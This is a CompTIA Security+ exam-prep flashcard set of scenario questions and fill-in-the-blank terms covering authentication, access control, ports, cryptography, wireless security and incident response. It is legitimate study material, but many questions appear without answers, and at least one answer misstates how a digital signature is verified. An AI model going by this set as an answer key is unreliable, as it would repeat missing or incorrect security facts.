CompTIA Security+ Exam
Terms in this set (749)
A security administrator is implementing a security program that addresses confidentiality and availability. What else should the administrator include?
Ensure systems are not susceptible to unauthorized changes
You need to transmit PII via email and you want to maintain its confidentiality. What should you do?
Encrypt it before sending
Lisa manages network devices in your organization and maintains copies of the configuration files for all the managed routers and switches. On a weekly basis, she creates hashes for these files and compares them with the hashes she created on the same files the previous week. Which security goal is she pursuing?
An organization wants to provide protection against malware attacks. Administrators have installed antivirus software on all computers. Additionally, they implemented a firewall and an IDS on the network. What identifies this principle?
Homer called into the help desk and says he forgot his password. What should the help-desk professional do after Homer has verified his identity?
Reset the password and configure the password to expire after the first use
Which type of authentication does a hardware token provide?
Which type of authentication is a retina scan?
Users are required to log on to their computers with a smart card and a PIN. Which describes this?
Your company recently began allowing workers to telecommute from home one or more days a week. However, your company doesn't currently have a remote access solution. They want to implement an AAA solution that supports different vendors. Which of the following is the BEST choice?
Your organization has implemented a system that stores user credentials in a central database. Users log on once with their credentials. They can then access other systems in the organization without logging on again. What does this describe?
Your organization issues users a variety of different mobile devices. However, management wants to reduce potential data losses if the devices are lost or stolen. Which of the following is the BEST technical control to achieve this goal?
Your primary job activities include monitoring security logs, analyzing trend reports, and installing CCTV systems. Which of the following choices BEST identifies your responsibilities?
Detecting security incidents and implementing monitoring controls
A security professional has reported an increase in the number of tailgating violations into a secure data center. What can prevent this?
You are redesigning your password policy. You want to ensure that users change their passwords regularly, but they are unable to reuse passwords. What settings should you configure?
Maximum password age, password history, and minimum password age
An outside security auditor recently completed an in-depth security audit on your network. One of the issues he reported was related to passwords. Specifically, he found the following passwords used on the network: Pa$$, 1@W2, and G7bT3. What should be changed to avoid the problem shown with these passwords?
A recent security audit discovered several apparently dormant user accounts. Although users could log on to the accounts, no one had logged on to them for more than 60 days. You later discovered that these accounts are for contractors who work approximately one week every quarter. What is the BEST response to this situation?
Disable the accounts
Your organization routinely hires contractors to assist with different projects. Administrators are rarely notified when a project ends and contractors leave. Which of the following is the BEST choice to ensure that contractors cannot log on with their account after they leave?
Enable account expiration
Developers are planning to develop an application using role-based access control. Which of the following would they MOST likely include in their planning?
A matrix of functions matched with their required privileges
An organization has implemented an access control model that enforces permissions based on data labels assigned at different levels. What type of model is this?
mandatory access control (MAC)
Your organization's security policy requires that PII data at rest and PII data in transit be encrypted. Of the following choices, what would the organization use to achieve these objectives?
Secure Shell (SSH) and Pretty Good Privacy / GNU Privacy Guard (PGP/GPG)
Which of the following list of protocols use TCP port 22 by default?
SSH, SCP, SFTP
Bart wants to block access to all external web sites. Which port should he block at the firewall?
You need to manage a remote server. Which of the following ports should you open on the firewall between your system and the remote server?
22 and 3389
While reviewing logs on a firewall, you see several requests for the AAAA record of gcgapremium.com. What is the purpose of this request?
To identify the IPv6 address of gcgapremium.com
While reviewing logs on a firewall, you see several requests for the "A" record of gcgapremium.com. What is the purpose of this request?
To identify the IPv4 address of gcgapremium.com
While reviewing logs on a firewall, you see several requests for the MX record of gcgapremium.com. What is the purpose of this request?
To identify the mail server for gcgapremium.com
While reviewing logs on a firewall, you see several requests for the CNAME record of gcgapremium.com. What is the purpose of this request?
To identify any aliases used by gcgapremium.com
Your organization has several switches used within the network. You need to implement a security control to secure the switch from physical access. What should you do?
Disable unused ports
You are configuring a switch and need to ensure that only authorized devices can connect to it and access the network through this switch. Which of the following is the BEST choice to meet this goal?
An ______________ server provides port-based authentication and can prevent unauthorized devices from connecting to a network.
__________________________ will prevent switching loop problems, but doesn't authenticate clients.
Rapid Spanning Tree Protocol (RSTP)
You need to configure a UTM security appliance to restrict access to peer-to-peer file sharing web sites. What are you MOST likely to configure?
Your organization has implemented a network design that allows internal computers to share one public IP address. Of the following choices, what did they MOST likely implement?
Port Address Translation (PAT)
Port Address Translation (PAT) is a form of __________________ and it allows many internal devices to share one public IP address.
Network Address Translation (NAT)
____________________________ uses multiple public IP addresses instead of just one.
Dynamic Network Address Translation (DNAT)
__________________________ secures transmissions for data in transit.
Transport Layer Security (TLS)
What would you configure on a Layer 3 device to allow FTP traffic to pass through?
Access Control List (ACL)
What type of device would have the following entries used to define its operation?
permit IP any any eq 80
permit IP any any eq 443
deny IP any any
You are preparing to deploy an anomaly-based detection system to monitor network activity. What would you create first?
A security company wants to gather intelligence about current methods attackers are using against its clients. What can it use?
________________ help protect against SYN flood attacks.
______________________ systems use signatures similar to antivirus software.
A __________________ is a server designed to look valuable to an attacker and can divert attacks.
Lisa oversees and monitors processes at a water treatment plant using SCADA systems. Administrators recently discovered malware on her system that was connected to the SCADA systems. Although they removed the malware, management is still concerned. Lisa needs to continue using her system and it's not possible to update the SCADA system. What can mitigate this risk?
Install a NIPS on the border of the SCADA network
Your organization maintains a separate wireless network for visitors in a conference room. However, you have recently noticed that people are connecting to this network even when there aren't any visitors in the conference room. You want to prevent these connections, while maintaining easy access for visitors in the conference room. Which of the following is the BEST solution?
Reduce antenna power
Which of the following represents the BEST action to increase security in a wireless network?
Replace Temporal Key Integrity Protocol (TKIP) with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP)
Your organization is hosting a wireless network with an 802.1x server using Protected Extensible Authentication Protocol (PEAP). On Thursday, users report they can no longer access the wireless network. Administrators verified the network configuration matches the baseline, there aren't any hardware outages, and the wired network is operational. Which of the following is the MOST likely cause for this problem?
The RADIUS server certificate expired
You are planning a wireless network for a business. A core requirement is to ensure that the solution encrypts user credentials when users enter their usernames and passwords. Which of the following BEST meets this requirement?
WPA2 over EAP-TTLS
A small business owner modified his wireless router with the following settings:
After saving his settings, an employee reports that he cannot access the wireless network anymore. What is the most likely reason that the employee cannot access the network?
Hardware address filtering
___________________ filtering can block or allow access based on a device's MAC address, also known as the hardware address.
Homer recently implemented a wireless network in his home using WEP. He asks you for advice. Which of the following is the BEST advice you can give him?
He should not use WEP because it implements weak IVs for encryption keys
Which of the following is an attack against a mobile device?
A network administrator needs to open a port on a firewall to support a VPN using PPTP. What ports should the administrator open?
What protocol ID does IPsec use?
Attackers recently attacked a web server hosted by your organization. Management has tasked administrators with reducing the attack surface of this server to prevent future attacks. Which of the following will meet this goal?
Disabling unnecessary services
After disabling unnecessary services, what should you do next to reduce the attack surface of a web server?
Identify the baseline
Network administrators identified what appears to be malicious traffic coming from an internal computer, but only when no one is logged on to the computer. You suspect the system is infected with malware. It periodically runs an application that attempts to connect to web sites over port 80 with Telnet. After comparing the computer with a list of services from the standard image, you verify this application is very likely the problem. What process allowed you to make this determination?
An updated security policy defines what applications users can install and run on company-issued mobile devices. Which of the following technical controls will enforce this policy?
You want to test new security controls before deploying them. Which of the following technologies provides the MOST flexibility to meet this goal?
An organization recently suffered a significant outage after a technician installed an application update on a vital server during peak hours. The server remained down until administrators were able to install a previous version of the application on the server. What could the organization implement to prevent a re-occurrence of this problem?
Create a patch management policy
A ___________________ includes plans for identifying, testing, scheduling, and deploying updates.
Patch Management Policy
A security analyst is evaluating a critical industrial control system. The analyst wants to ensure the system has security controls to support availability. Which of the following will BEST meet this need?
Implementing control redundancy and diversity
Of the following choices, what are valid security controls for mobile devices?
Screen locks, device encryption, and remote wipe
A new mobile device security policy has authorized the use of employee-owned devices, but mandates additional security controls to protect them if devices are lost or stolen. Which of the following meets this goal?
Screen locks and device encryption
You want to deter an attacker from using brute force to gain access to a mobile device. What would you configure?
Account lockout settings
________________________ can be used for automated inventory control to detect movement of devices.
Radio-Frequency Identification (RFID)
Management within your company is considering allowing users to connect to the corporate network with their personally owned devices. Which of the following represents a security concern with this policy?
Inability to ensure devices are up to date with current system patches
Your organization is planning to issue mobile devices to some employees, but they are concerned about protecting the confidentiality of data if the devices are lost or stolen. Which of the following is the BEST way to secure data at rest on a mobile device?
Full device encryption
Your organization recently purchased several new laptop computers for employees. You're asked to encrypt the laptop's hard drives without purchasing any additional hardware. What would you use?
Trusted Platform Module (TPM)
Management within your organization wants to limit documents copied to USB flash drives. Which of the following can be used to meet this goal?
Data Loss Prevention (DLP)
Bart installed code designed to enable his account automatically, three days after anyone disables it. What does this describe?
A logic bomb is code that executes in response to an event. If the logic bomb is set to enable an account after it has been disabled, the logic bomb is creating a ______________________.
Lisa recently completed an application used by the Personnel department to store PII and other employee information. She programmed in the ability to access this application with a username and password that only she knows, so that she can perform remote maintenance on the application if necessary. What does this describe?
A recent change in an organization's security policy states that monitors need to be positioned so that they cannot be viewed from outside any windows. What is the purpose of this policy?
Reduce success of shoulder surfing
You are troubleshooting an intermittent connectivity issue with a web server. After examining the logs, you identify repeated connection attempts from various IP addresses. You realize these connection attempts are overloading the server, preventing it from responding to other connections. Which of the following is MOST likely occurring?
Your organization includes the following statement in the security policy:
"Security controls need to protect against both online and offline password brute force attacks."
Which of the following controls is the LEAST helpful to meet these goals?
__________________ helps protect against brute force attacks.
A code review of a web application discovered that the application is not performing boundary checking. What should the web developer add to this application to resolve this issue?
Input validation includes boundary or limit checking to validate data before using it. Proper input validation also prevents many problems such as cross-site request forgery (XSRF), ______________________, buffer overflow, and command injection attacks.
Cross-Site Scripting (XSS)
A web developer is using methods to validate user input in a web site application. This ensures the application isn't vulnerable to XSS, SQL Injection, Buffer Overflow, and Command Injection. What attack is not prevented by validating user input?
Checking the logs of a web server, you see the following entry:
22.214.171.124 --[1/Sep/2013:05:20]"GET /index.php?
"http://gcgapremium.com/security/" "Chrome3 1"
Which of the following is the BEST choice to explain this entry?
A buffer overflow attack
A _____________ attack uses specific SQL code, not random letters or characters.
A _______________ attack attempts to redirect users from one web site to another web site.
Looking at logs for an online web application, you see that someone has entered the following phrase into several queries:
Which of the following is the MOST likely explanation for this?
An SQL Injection attack
A security tester is using fuzzing techniques to test a software application. Which of the following does fuzzing use to test the application?
_____________________ sends random or unexpected input into an application to test the application's ability to handle it.
_______________attacks use formatted input.
An organization has purchased fire insurance to manage the risk of a potential fire. What method are they using?
___________________ attempts to discourage attacks with preventative controls such as a security guard.
____________________ reduces risks through internal controls.
You are asked to identify the number of times a specific type of incident occurs per year. Which of the following BEST identifies this?
Annual Rate of Occurrence (ARO)
__________________ identifies the expected monetary loss for an incident.
Annual Loss Expectancy (ALE)
_________________________ identifies the expected monetary loss for a single incident.
Single Loss Expectancy (SLE)
Security experts at your organization have determined that your network has been repeatedly attacked from multiple entities in a foreign country. Research indicates these are coordinated and sophisticated attacks. What BEST describes this activity?
Advanced Persistent Threat
Bart is performing a vulnerability assessment. Which of the following BEST represents the goal of this task?
Identify the system's security posture
You need to ensure that several systems have all appropriate security controls and patches. However, your supervisor specifically told you not to attack or compromise any of these systems. Which of the following is the BEST choice to meet these goals?
Which of the following tools is the MOST invasive type of testing?
__________________________ identifies hosts on a network.
A security professional is testing the functionality of an application, but does not have any knowledge about the internal coding of the application. What type of test is this tester performing?
Testers are analyzing the web application your organization is planning to deploy. They have full access to product documentation, including the code and data structures used by the application. What type of test will they MOST likely perform?
A network administrator is attempting to identify all traffic on an internal network. Which of the following tools is the BEST choice?
Your organization security policy requires that personnel notify security administrators if an incident occurs. However, this is not occurring consistently. Which of the following could the organization implement to ensure security administrators are notified in a timely manner?
A security administrator is reviewing an organization's security policy and notices that the policy does not define a time frame for reviewing user rights and permissions. Which of the following is the MINIMUM time frame that she should recommend?
At least one year
Security personnel recently performed a security audit. They identified several employees who had permissions for previously held jobs within the company. What should the organization implement to prevent this in the future?
Account Management Controls
A ____________________________ model uses group-based permissions, but it doesn't force administrators to take a user out of a security group when the user moves to a different job.
role-based access control (role-BAC)
You are a technician at a small organization. You need to add fault-tolerance capabilities within the business to increase the availability of data. However, you need to keep costs as low as possible. Which of the following is the BEST choice to meet these needs?
A ____________________ provides fault tolerance for servers and can increase data availability but is significantly more expensive than a RAID subsystem.
An organization needs to identify a continuity of operations plan that will allow it to provide temporary IT support during a disaster. The organization does not want to have a dedicated site. Which of the following provides the best solution?
Monty Burns is the CEO of the Springfield Nuclear Power Plant. What would the company have in place in case something happens to him?
A continuity of operations plan for an organization includes the use of a warm site. The BCP coordinator wants to verify that the organization's backup data center is prepared to implement the warm site if necessary. Which of the following is the BEST choice to meet this need?
Perform a disaster recovery exercise
Users are complaining of intermittent connectivity issues. When you investigate, you discover that new network cables for these user systems were run across several fluorescent lights. What environmental control will resolve this issue?
A software company occasionally provides application updates and patches via its web site. It also provides a checksum for each update and patch. Which of the following BEST describes the purpose of the checksum?
Integrity of updates and patches
The checksum (also known as a ____________) provides integrity for patches and updates so users can verify they have not been modified.
Humidity controls provide protection against condensation and ___________.
Electro-Static Discharge (ESD)
A function converts data into a string of characters and the string of characters cannot be reversed to re-create the original data. What type of function is this?
A hash function is typically displayed in a _____________________.
_____________________ (including symmetric, asymmetric, and stream ciphers) create ciphertext from plain-text data, but they include decryption algorithms to re-create the original data.
Which of the following is a symmetric encryption algorithm that encrypts data one bit at a time and is more efficient when the size of the data is unknown, such as streaming audio or video?
A ______________________ (such as AES and DES) encrypts data in specific-sized blocks, such as 64-bit blocks or 128-bit blocks.
____________________ is a hashing algorithm.
A supply company has several legacy systems connected together within a warehouse. An external security audit discovered the company is using DES and mandated the company upgrade DES to meet minimum security requirements. The company plans to replace the legacy systems next year, but needs to meet the requirements from the audit. Which of the following is MOST likely to be the simplest upgrade for these systems?
Network administrators in your organization need to administer firewalls, security appliances, and other network devices. These devices are protected with strong passwords, and the passwords are stored in a file listing these passwords. Which of the following is the BEST choice to protect this password list?
Bart, an employee at your organization, is suspected of leaking data to a competitor. Investigations indicate he sent several email messages containing pictures of his dog. Investigators have not been able to identify any other suspicious activity. Which of the following is MOST likely occurring?
Bart is leaking data using steganography
You are planning to encrypt data in transit with IPsec. Which of the following is MOST likely to be used with IPsec?
Hash-based Message Authentication Code (HMAC)
_____________________ mandates the use of HMAC for authentication and integrity when encrypting data in transit with IPsec.
When encryption is used, RFC 4835 mandates the use of either ________________.
AES or 3DES
Bart wants to send a secure email to Lisa, so he decides to encrypt it. He wants to ensure that only Lisa can decrypt it. What does Lisa need to meet this requirement?
Lisa's Private Key
Bart wants to send a secure email to Lisa, so he decides to encrypt it. What would Bart use to encrypt the email?
Lisa's Public Key
Bart wants to send a secure email to Lisa. If Bart wanted Lisa to have verification that he sent it, what would he do?
Create a digital signature with his private key
If Bart sent a secure email to Lisa and created a digital signature with his private key so Lisa would have verification that he sent it, how would Lisa decrypt it?
Lisa would decrypt the private key with Bart's public key
An organization requested bids for a contract and asked companies to submit their bids via email. After winning the bid, Acme realized it couldn't meet the requirements of the contract. Acme instead stated that it never submitted the bid. Which of the following would provide proof to the organization that Acme did submit the bid?
_____________ provide verification of who sent a message, non-repudiation preventing them from denying it, and integrity verifying the message wasn't modified.
Application developers are creating an application that requires users to log on with strong passwords. The developers want to store the passwords in such a way that it will thwart brute force attacks. Which of the following is the BEST solution?
Password-Based Key Derivation Function 2 (PBKDF2)
Password-Based Key Derivation Function 2 (PBKDF2) is a ________________ technique designed to protect against brute force attempts.
Password-Based Key Derivation Function 2 (PBKDF2) and bcrypt _______________ the password with additional bits.
Passwords stored using _____________________ are easy to crack because they don't use salts.
A web site is using a certificate. Users have recently been receiving errors from the web site indicating that the web site's certificate is revoked. Which of the following includes a list of certificates that have been revoked?
Certificate Revocation List (CRL)
A Certificate Revocation List (CRL) is a list of certificates that a ___________________ has revoked.
Certificate Authority (CA)
The __________________________ validates trust with certificates, but only returns short responses such as good, unknown, or revoked.
Online Certificate Status Protocol (OCSP)
A ___________________________ is used to request certificates.
Certificate Signing Request (CSR)
Which of the following is a management control?
Written security policies are ___________________.
Encryption and principle of least privilege are ______________.
Change management is an ______________________.
Security personnel recently identified potential fraud committed by a network administrator. Investigators discovered this administrator performs several job functions within the organization, including database administration and application development. Which of the following is the BEST solution to reduce risk associated with this activity?
Separation of Duties
A __________________________ policy is useful to discover fraud committed by an individual.
__________________________ ensures changes are reviewed before being implemented.
Security experts want to reduce risks associated with updating critical operating systems. Which of the following will BEST meet this goal?
Your company is considering implementing SSO capabilities to company applications and linking them to a social media site. When implemented, users can log on to Facebook and then access company applications without logging on again. What is a potential risk related to this plan?
A data breach exposing passwords on the social media site will affect the company application.
You work as a help-desk professional in a large organization. You have begun to receive an extraordinary number of calls from employees related to malware. Using common incident response procedures, what should be your FIRST response?
In Incident Response procedures, the __________________ phase is performed before the incident, and includes steps to prevent incidents.
After identifying an incident is valid, the next step is ________________ and notification and then mitigation steps.
A technician confiscated an employee's computer after management learned the employee had unauthorized material on his system. Later, a security expert captured a forensic image of the system disk. However, the security expert reported the computer was left unattended for several hours before he captured the image. Which of the following is a potential issue if this incident goes to court?
Chain of Custody
Social engineers have launched several successful phone-based attacks against your organization resulting in several data leaks. Which of the following would be the MOST effective at reducing the success of these attacks?
Implement a program to increase security awareness.
Homer needs to send an email to his HR department with an attachment that includes PII. He wants to maintain the confidentiality of this attachment. Which of the following choices is the BEST choice to meet his needs?
Hashing, digital signatures, and certificates all provide integrity, but not ____________________.
You want to ensure that messages sent from administrators to managers arrive unchanged. Which security goal are you addressing?
Integrity provides assurances that data has not been modified and is commonly enforced with ________________.
___________________________ prevents unauthorized disclosure of data but does not address modifications of data.
_________________________ ensures systems are up and operational when needed and uses fault tolerance and redundancy methods.
____________________ provides proof that users are who they say they claim to be.
Your organization recently implemented two servers that act as failover devices for each other. Which security goal is your organization pursuing?
A ____________________ uses redundant servers to ensure a service will continue to operate even if one of the servers fails.
______________________ provide safety for personnel and other assets.
________________________ ensure that data has not been modified.
____________________ such as encryption, prevent the unauthorized disclosure of data.
Management at your company recently decided to implement additional lighting and fencing around the property. Which security goal is your company MOST likely pursuing?
Confidentiality is enhanced with encryption and ________________.
Integrity is enhanced with _________________________.
hashing, certificates and digital signatures
Availability is enhanced with ___________________________ procedures.
redundancy and fault-tolerance
You are logging on to your bank's web site using your email address and password. What is the purpose of the email address in this example?
You are logging on to your bank's web site using your email address and password. What does the password combined with the email provide?
Your organization has a password policy with a password history value of 12. What does this indicate?
Twelve different passwords must be used before reusing the same password.
Password _________________________ identifies the length of time that must pass before users can change a password again.
A user calls into the help desk and asks the help-desk professional to reset his password. Which of the following choices is the BEST choice for what the help-desk professional should do before resetting the password?
Verify the user's identity.
Your organization is planning to implement remote access capabilities. Management wants strong authentication and wants to ensure that passwords expire after a predefined time interval. Which of the following choices BEST meets this requirement?
Time-Based One-Time Password (TOTP)
Which type of authentication is a fingerprint scan?
When users log on to their computers, they are required to enter a username, a password, and a PIN. Which of the following choices BEST describes this?
_____________________________ is when both entities in the authentication process authenticate with each other.
The security manager at your company recently updated the security policy. One of the changes requires dual-factor authentication. Which of the following will meet this requirement?
Hardware Token and PIN
Your network infrastructure requires users to authenticate with something they are and something they know. Which of the following choices BEST describes this authentication method?
_______________________ is a remote access authentication service that supports Extensible Authentication Protocol (EAP).
Which of the following authentication services uses tickets for user credentials?
A network includes a ticket-granting ticket server. Which of the following choices is the primary purpose of this server?
Your network uses an authentication service based on the X.500 specification. When encrypted, it uses TLS. Which authentication service is your network using?
Lightweight Directory Access Protocol (LDAP)
Security Assertion Markup Language (SAML) is an Extensible Markup Language (XML) used for ________________________.
Single Sign-On (SSO)
When you log on to your online bank account, you are also able to access a partner's credit card site, check-ordering services, and a mortgage site without entering your credentials again. What does this describe?
Your organization recently made an agreement with third parties for the exchange of authentication and authorization information. The solution uses an XML-based open standard. Which of the following is the MOST likely solution being implemented?
Terminal Access Controller Access-Control System Plus (TACACS+) is an ___________________ that replaces the older TACACS protocol.
Which of the following provides authentication services and uses PPP?
PAP and CHAP
Users in your organization access your network from remote locations. Currently, the remote access solution uses RADIUS. However, the organization wants to implement a stronger authentication service that supports Extensible Authentication Protocol (EAP). Which of the following choices BEST meets this goal?
What provides authentication services for remote users and devices?
RADIUS and Diameter
Which of the following accurately identifies the primary security control classifications?
Technical, Management, and Operational
________________________ are role-based, rule-based, mandatory, and discretionary.
Access Control Methods
You need to reduce the attack surface of a web server. Which of the following is a preventative control that will assist with this goal?
Disabling unnecessary services
Initial _______________________ is useful to determine the security posture of a system, but doesn't prevent attacks.
A security expert is identifying and implementing several different physical deterrent controls to protect an organization's server room. Which of the following choices would BEST meet this objective?
Using hardware locks
_______________________ is a technical control designed to protect data.
You need to secure access to a data center. Which of the following choices provides the BEST physical security to meet this need?
Biometrics, CCTV, and Mantrap
A security professional needs to identify a physical security control that will identify and authenticate individuals before allowing them to pass, and restrict passage to a single person at a time. What should the professional recommend?
Your company wants to control access to a restricted area of the building by adding an additional physical security control that includes facial recognition. Which of the following provides the BEST solution?
________________________ are effective barricades to block vehicles.
Employees access a secure area by entering a cipher code, but this code does not identify individuals. After a recent security incident, management has decided to implement a key card system that will identify individuals who enter and exit this secure area. However, the installation might take six months or longer. Which of the following choices can the organization install immediately to identify individuals who enter or exit the secure area?
Thieves recently rammed a truck through the entrance of your company's main building. During the chaos, their partners proceeded to steal a significant amount of IT equipment. What can you do to prevent this from happening again?
You maintain a training lab with 18 computers. You have enough rights and permissions on these machines so that you can configure them as needed for classes. However, you do not have the rights to add them to your organization's domain. Which of the following choices BEST describes this example?
Developers in your organization have created an application designed for the sales team. Salespeople can log on to the application using a simple password of 1234. However, this password does not meet the organization's password policy. What is the BEST response by the security administrator after learning about this?
Direct the application team manager to ensure the application adheres to the organization's password policy.
You are redesigning your password policy to increase the security of the passwords. Which of the following choices provides the BEST security?
Password complexity and length
A company's account management policy dictates that administrators should disable user accounts instead of deleting them when an employee leaves the company. What security benefit does this provide?
Ensures that user keys are retained
Disabling an account instead of deleting it helps ensure that access to files is retained, but does not directly retain _________________.
You need to create an account for a contractor who will be working at your company for 90 days. Which of the following is the BEST security step to take when creating this account?
Configure an expiration date on the account
You're asked to identify who is accessing a spreadsheet containing employee salary data. Detailed logging is configured correctly on this file. However, you are unable to identify a specific person who is accessing the file. What is the MOST likely reason?
Shared accounts are not prohibited.
When shared accounts are not prohibited, ________________ are allowed to access the same file. For example, if the Guest account is enabled and used as a shared account by all users, the logs will indicate the Guest account accessed the file, but won't identify specific individuals.
Members of a project team came in on the weekend to complete some work on a key project. However, they found that they were unable to access any of the project data. Which of the following choices is the MOST likely reason why they can't access this data?
Time-of-day access control
An administrator needs to grant users access to different servers based on their job functions. Which access control model is the BEST choice to use?
Role-based access control
A ___________________________________ specifies that every object has an owner and owners have full control over objects.
discretionary access control
______________________________ uses labels and a lattice to grant access rather than job functions.
Mandatory access control
A ________________________________ model uses rules that trigger in response to events.
rule-based access control
Interns from a local college frequently work at your company. Some interns work with the database developers, some interns work with the web application developers, and some interns work with both developers. Interns working with the database developers require specific privileges, and interns working with the web application developers require different privileges. What is the simplest method to meet these requirements?
Use group-based privileges
Your organization wants to reduce the administrative workload related to account management. Which of the following is the BEST choice?
Implement group-based privileges
___________________________ are extremely tedious and time-consuming because privileges are assigned to all users individually.
Bart has read access to an accounting database and Lisa has both read and write access to this database. A database application automatically triggers a change in permissions so that Bart has both read and write access when Lisa is absent. What type of access control system is in place?
Rule-based Access Control System (Rule-BAC)
The ______________________ model uses labels to identify users and data, and is used in systems requiring a need to know.
Mandatory Access Control (MAC)
Your organization hosts several classified systems in the data center. Management wants to increase security with these systems by implementing two-factor authentication. Management also wants to restrict access to these systems to employees who have a need to know. Which of the following choices should management implement for authorization?
Mandatory Access Control (MAC)
What protocol does IPv6 use for hardware address resolution?
Neighbor Discovery Protocol (NDP)
What protocol does IPv4 use for hardware address resolution?
Address Resolution Protocol (ARP)
_______________________ is used to connect to remote systems over port TCP 3389.
Remote Desktop Protocol (RDP)
______________________ is used to monitor and manage network devices.
Simple Network Management Protocol (SNMP)
What is the default port for SSH?
You are configuring a host-based firewall so that it will allow SFTP connections. Which of the following is required?
Allow TCP 22
You need to send several large files containing proprietary data to a business partner. Which of the following is the BEST choice for this task?
Your organization is planning to establish a secure link between one of your mail servers and a business partner's mail server. The connection will use the Internet. What protocol is the BEST choice?
Transport Layer Security (TLS) is a good protocol choice to create a _____________ between two systems over the Internet.
You recently learned that a network router has TCP ports 22 and 80 open, but the organization's security policy mandates that these should not be accessible. What should you do?
Disable the SSH and HTTP services on the router
You need to prevent the use of Trivial File Transfer Protocol (TFTP) through your firewall. Which port would you block?
You need to enable the use of Network Basic Input/Output System (NetBIOS) through a firewall. Which ports should you open?
137 through 139
Lisa wants to manage and monitor the switches and routers in her network. Which of the following protocols would she use?
Simple Network Management Protocol (SNMP) monitors and manages ______________.
You need to divide a single Class B IP address range into several ranges. What would you do?
Subnet the Class B IP address range.
You need to reboot your DNS server. Of the following choices (Unix server, Apache server, BIND server or Web server), which type of server are you MOST likely to reboot?
The Berkeley Internet Name Domain (BIND) is a type of ___________ commonly used on the Internet and in some internal networks.
Your organization is increasing security and wants to prevent attackers from mapping out the IP addresses used on your internal network. Which of the following choices is the BEST option?
Implementing secure zone transfers.
Implementing secure zone transfers on ___________ prevents attackers from downloading zone data and mapping out IP addresses and devices.
internal DNS servers
A ___________________ protects a web server.
Web Application Firewall (WAF)
DNS name resolution queries use UDP port 53; blocking ___________ on UDP port 53 would prevent internal users from using DNS on the Internet.
A network technician incorrectly wired switch connections in your organization's network. It effectively disabled the switch as though it was a victim of a denial-of-service attack. What should be done to prevent this in the future?
Implement STP or RSTP
___________ will prevent switching loop problems. If two ports on a switch are connected to each other, it creates a switching loop and effectively disables the switch.
Spanning Tree Protocol (STP) or Rapid STP
Your organization frequently has guests visiting in various conference rooms throughout the building. These guests need access to the Internet via wall jacks, but should not be able to access internal network resources. Employees need access to both the internal network and the Internet. What would BEST meet this need?
VLANs and 802.1x
An ___________ provides port-based authentication and can authenticate clients. Clients that cannot authenticate can be redirected to a virtual local area network (VLAN) that grants them Internet access, but not access to an internal network.
Your organization wants to prevent users from accessing file sharing web sites. Which of the following choices meets this need?
Proxy servers and ___________ devices include URL filters.
unified threat management (UTM)
___________ include content inspection to identify and filter out different types of files and traffic, and malware inspection to identify and block malware.
Your organization wants to combine some of the security controls used on the network. What could your organization implement to meet this goal?
A UTM device combines ___________ into a single device.
multiple security controls
Your organization hosts a web server and wants to increase its security. You need to separate all web-facing traffic from internal network traffic. Which of the following provides the BEST solution?
You can use a ___________ to group computers together based on job function or some other administrative need. It is created on switches in the internal network.
Network administrators connect to a legacy server using Telnet. They want to secure these transmissions using encryption at a lower layer of the OSI model. What could they use?
IPv6 includes the use of ___________ which operates on Layer 3 of the OSI reference model.
Internet Protocol security (IPsec)
Which of the following operates on the HIGHEST layer of the OSI model, and is the most effective at blocking application attacks?
web application firewall (WAF)
A web application firewall (WAF) operates on multiple layers up to Layer 7 of the OSI reference model and blocks attacks against a ___________.
An ___________ operates on multiple layers up to Layer 7 of the OSI model; however, it is more effective at detecting attacks than blocking them.
A router operates on ___________ of the OSI model and it can perform packet filtering.
A ___________ only performs packet filtering and isn't effective against Application layer attacks.
Your network currently has a dedicated firewall protecting access to a web server. It is currently configured with the following two rules in the ACL along with an implicit allow rule at the end:
PERMIT TCP ANY ANY 443
PERMIT TCP ANY ANY 80
You have detected DNS requests and zone transfer requests coming through the firewall and you need to block them. Which of the following would meet this goal?
Add the following rule to the firewall: DENY IP ALL ALL 53, and change the implicit allow rule to implicit deny.
Your organization hosts three wireless networks for different purposes. A recent site survey audit discovered the information shown in the following table:
SSID Security Channel Power
GetCertifiedVisitors WPA2 1 71dBm
GetCertifiedEmployee WPA2 2 94dBm
GetCertifiedEmployees WPA2 3 73dBm
GetCertifiedKiosk WPA2 5 79dBm
What does this indicate?
Rogue access point
Which of the following network tools includes sniffing capabilities allowing them to inspect packet streams for malicious activity?
A __________ provides access to a wired network for wireless devices.
wireless access point (WAP)
A __________ system inspects clients to ensure they meet minimum security requirements.
network access control (NAC)
A HIDS reported a vulnerability on a system using an assigned vulnerability identification number. After researching the number on the vendor's web site, you identify the recommended solution and begin applying it. What type of HIDS is in use?
A _____________-, anomaly-, or behavior-based detection system catches issues that are not previously known. It compares current activity with a previously created baseline to detect any anomalies or changes.
Management is concerned about malicious activity on your network and wants to implement a security control that will detect unusual traffic on the network. Which of the following is the BEST choice to meet this goal?
Administrators have noticed an increased workload recently. Which of the following can cause an increased workload from incorrect reporting because they falsely indicate an alert has occurred?
A ___________ doesn't report an actual attack, so administrators are unaware of an attack.
A security company wants to identify and learn about current and new attack methodologies. Which of the following is the BEST choice to meet this objective?
A honeypot is a server designed to look valuable to an attacker and can help administrators learn about ___________, or previously unknown attacks.
Of the following choices, what can you use to divert malicious attacks on your network from valuable data to worthless fabricated data?
A ___________ can filter and cache content from web pages.
Your network IDS recently detected an attack on a server. Upon investigation, you discover that the IDS does not have a signature on this attack. Instead, the IDS detected it using a heuristic analysis. Of the following choices, what is the MOST likely category of this attack?
Definition-based IDS are the same as signature-based IDS. Many signatures are based on the ___________ list.
Common Vulnerabilities and Exposures (CVE)
You need to provide connectivity between two buildings without running any cables. You decide to use two WAPs and a high-gain directional antenna. Which of the following antennas is the BEST choice to meet this need?
A ___________ is a high-gain directional antenna with a very narrow radiation pattern.
An ___________ is theoretical and indicates the signal goes in all directions equally.
___________ attempt to mimic an isotropic antenna, but have stronger gains horizontally than vertically, assuming they are standing vertically.
Omnidirectional and dipole antennas
You are assisting a user in implementing a wireless network in his home. The wireless hardware he has requires the RC4 protocol. What type of security is BEST for this network?
Temporal Key Integrity Protocol (TKIP) uses ___________ and is compatible with older hardware such as Wi-Fi Protected Access (WPA).
Wi-Fi Protected Access (WPA) and ______________ use RC4; however, the latter is not secure and should not be used.
Wired Equivalent Privacy (WEP)
______________ is stronger than WPA-TKIP, but it uses AES instead of RC4.
______________ requires an 802.1x server and it does not use RC4.
Wi-Fi Protected Access II (WPA2)
You want to implement a STRONG level of security on a wireless network. Which of the following supports this goal?
You are planning to deploy a WLAN and you want to ensure it is secure. Which of the following provides the BEST security?
